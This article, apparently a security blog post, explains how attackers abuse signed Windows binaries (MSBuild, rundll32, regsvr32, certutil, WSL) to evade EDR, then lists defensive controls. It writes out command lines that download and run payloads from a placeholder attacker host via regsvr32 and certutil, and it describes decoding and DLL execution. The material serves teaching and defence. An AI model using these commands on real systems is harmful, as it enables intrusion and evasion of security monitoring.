LOLBAS Exploitation: Bypassing EDR Systems Using Native Windows Binaries

The term LOLBAS was coined and popularized by the cybersecurity research community to categorize a specific, highly structured subset of the broader "Living off the Land" strategy. To be officially classified on the community-driven LOLBAS project repository, a binary or script must meet specific criteria:

1. It must be a Microsoft-signed file. It is either natively installed with the Windows Operating System or can be downloaded directly from official Microsoft domains (like Sysinternals tools).
2. It must have a legitimate, intended administrative or system purpose. (e.g., managing certificates, building software, compiling code).
3. It must possess unexpected, undocumented, or highly abusable secondary functionality that can be leveraged by an attacker to further a compromise (such as downloading arbitrary files from the internet, executing arbitrary code, or bypassing User Account Control).

The threat posed by LOLBAS exploitation is profound and fundamentally challenges traditional defensive paradigms. EDR systems and Antivirus software rely heavily on reputation scoring and cryptographic signatures. A custom malware binary named hack.exe dropped in the C:\Temp directory immediately triggers alarms because it is unsigned, unknown, and has a terrible reputation score.

However, when the entirely legitimate Windows utility MSBuild.exe initiates an outbound network connection, or when rundll32.exe loads a library into memory, the EDR is far less likely to outright block it. Blocking these core Windows binaries could break legitimate Windows Update processes, software compilation, or fundamental OS operations, resulting in a system crash. Attackers ruthlessly exploit this necessity for operational continuity to execute their campaigns invisibly, hiding in the sheer volume of normal administrative noise.

The LOLBAS project documents hundreds of Windows binaries, scripts, and libraries. Let's deeply examine some of the most critical, powerful, and frequently exploited LOLBAS vectors used by Red Teams and threat actors to bypass EDR.

1. MSBuild.exe: Achieving Fileless Code Execution

MSBuild.exe is the Microsoft Build Engine. It is a native, highly trusted command-line utility included with the .NET framework, designed for building and compiling software applications. It is an absolute favorite among attackers for achieving stealthy, fileless code execution.

The Exploit Mechanism: MSBuild.exe is designed to read and process XML-formatted project files (typically .csproj or .xml). Security researchers discovered that they can embed raw, uncompiled C# code or even malicious shellcode directly within these XML project files using a feature called "inline tasks."

When an attacker drops a seemingly benign XML file onto the target system and executes the command MSBuild.exe malicious.xml, the highly trusted Microsoft binary parses the XML, dynamically compiles the embedded C# code on the fly, and executes it entirely within the memory space of MSBuild.exe.

Why it Successfully Bypasses EDR: This technique is devastating because the malicious payload is never written to the hard drive as a compiled executable (.exe). It exists only as text within an XML file, completely bypassing static AV file scans. Furthermore, the process actually executing the malicious code is the highly trusted MSBuild.exe. Because MSBuild frequently runs and compiles code in standard developer environments, behavioral detection is incredibly difficult without generating massive amounts of false positives for legitimate developers.

2. Rundll32.exe: Payload Delivery and Execution

Rundll32.exe is a standard, ubiquitous Windows utility used to invoke and run code contained within Dynamic Link Libraries (.DLL files). It is constantly running on healthy Windows systems.

The Exploit Mechanism: Attackers abuse rundll32.exe in two distinct, powerful ways: First, for stealthy payload delivery. Attackers can use specific command-line arguments to force rundll32 to connect to a remote server and execute code, entirely bypassing standard web browsers or PowerShell (which are heavily monitored). Second, for executing malicious DLLs. If an attacker successfully drops a malicious DLL onto the file system, they cannot just double-click it. They must execute it seamlessly using the trusted host process: rundll32.exe C:\Temp\malicious.dll,EntryPoint.

Why it Successfully Bypasses EDR: EDRs expect rundll32.exe to constantly load and execute DLLs as part of normal, everyday OS operation. It is extremely noisy. Furthermore, advanced attackers can use sophisticated techniques like "DLL unhooking" or "AMSI patching" within their malicious DLL payload to blind the EDR's visibility into the rundll32.exe process space exactly as the payload executes.

3. Regsvr32.exe: Executing Remote Scriptlets (Squiblydoo)

Similar in function to rundll32, Regsvr32.exe is a native command-line utility used for registering and unregistering OLE controls, such as DLLs and ActiveX controls, in the Windows Registry.

The Exploit Mechanism: Regsvr32.exe contains a highly abusable, infamous feature widely known in the security community as "Squiblydoo." It can be forced to retrieve and execute a Component Object Model (COM) scriptlet (a .sct file) directly from a remote web server, without ever writing the script to disk. The attack command looks like this: regsvr32.exe /s /n /u /i:http://attacker.com/payload.sct scrobj.dll

Why it Successfully Bypasses EDR: This single command reaches out to the internet, downloads an XML-formatted scriptlet containing malicious VBScript or JScript, and executes it directly in memory via the trusted scrobj.dll component. Because the executable initiating the action is a trusted, native Windows binary, it frequently bypasses application whitelisting solutions like Windows AppLocker and Software Restriction Policies (SRP). The EDR sees a trusted Windows binary making a web request, which is harder to definitively classify as malicious compared to a random executable doing the same.

4. Certutil.exe: The Built-in Downloader and Decoder

As discussed in broader "Living off the Land" strategies, Certutil.exe is a command-line program intended for managing certificates and certificate services. However, its robust feature set makes it heavily abused as a stealthy file downloader and data decoder.

The Exploit Mechanism (Downloading): Attackers use it to download payloads without triggering alerts associated with Invoke-WebRequest in PowerShell. The command is simple: certutil.exe -urlcache -split -f http://attacker.com/malware.exe C:\Temp\malware.exe

The Exploit Mechanism (Decoding): More dangerously, attackers use certutil.exe to decode Base64 encoded files on the fly. To bypass perimeter email gateways and network firewalls that scan for executable file signatures (.exe), an attacker can drop a harmless-looking plain text file containing a base64 encoded executable. They then use the native command certutil -decode encoded.txt decoded.exe to reconstruct the malicious binary directly on the target system, post-delivery.

5. Bash.exe / Wsl.exe (Windows Subsystem for Linux)

With the introduction of the Windows Subsystem for Linux (WSL), Microsoft embedded a full, functional Linux kernel interface directly into the Windows operating system. This created an entirely new, massive attack surface.

The Exploit Mechanism: Attackers can invoke bash.exe or wsl.exe directly from a Windows command prompt to execute Linux commands that manipulate the underlying Windows file system. An attacker can use native Linux networking tools like wget or curl to download payloads, or use python3 to establish reverse shells.

Why it Successfully Bypasses EDR: WSL acts as a massive blind spot for many legacy EDR agents and network monitoring tools. Many Windows-centric security tools only inspect network traffic originating from known Windows APIs (like WinINet or WinHTTP). Because WSL utilizes a different networking stack, the traffic generated by wget inside WSL often bypasses host-based firewalls and EDR network telemetry entirely.

Defending against LOLBAS exploitation requires a significant paradigm shift for Blue Teams. Since you cannot simply delete MSBuild.exe or block rundll32.exe without fundamentally breaking the operating system, defenders must rely on advanced behavioral analytics, strict execution controls, and deep process lineage tracking.

1. Tuning EDR Behavioral Rules: Modern EDR must be tuned to rigorously analyze the command-line arguments and process lineage, not just the executable name. For example, rundll32.exe running is normal; however, rundll32.exe making an outbound HTTP connection to an unrecognized, external IP address to download a .sct file is highly anomalous and should result in immediate process termination.
2. Windows Defender Application Control (WDAC): Implement strict application whitelisting using WDAC or AppLocker. Do not just whitelist by publisher (Microsoft). Create granular rules that actively block the execution of highly abused LOLBAS binaries (like MSBuild.exe, certutil.exe, or wmic.exe) for standard office users who have absolutely no legitimate business requirement to utilize them.
3. Comprehensive Command-Line Logging: Enable comprehensive Process Creation logging (Event ID 4688) with full command-line auditing enabled via Group Policy. This is critical. It ensures that even if an attacker uses a native tool, the exact, specific parameters they passed to it (e.g., the URL passed to certutil) are recorded and forwarded to the SIEM for analysis and threat hunting.
4. Leverage AMSI Integration: Ensure your security products deeply leverage the Microsoft Antimalware Scan Interface (AMSI). AMSI allows EDR and AV solutions to inspect the raw contents of scripts (like those executed via regsvr32, VBScript, or PowerShell) directly in memory, just before they are executed. This allows the EDR to identify malicious code patterns even if the code was delivered via a trusted LOLBAS vector and was obfuscated on disk.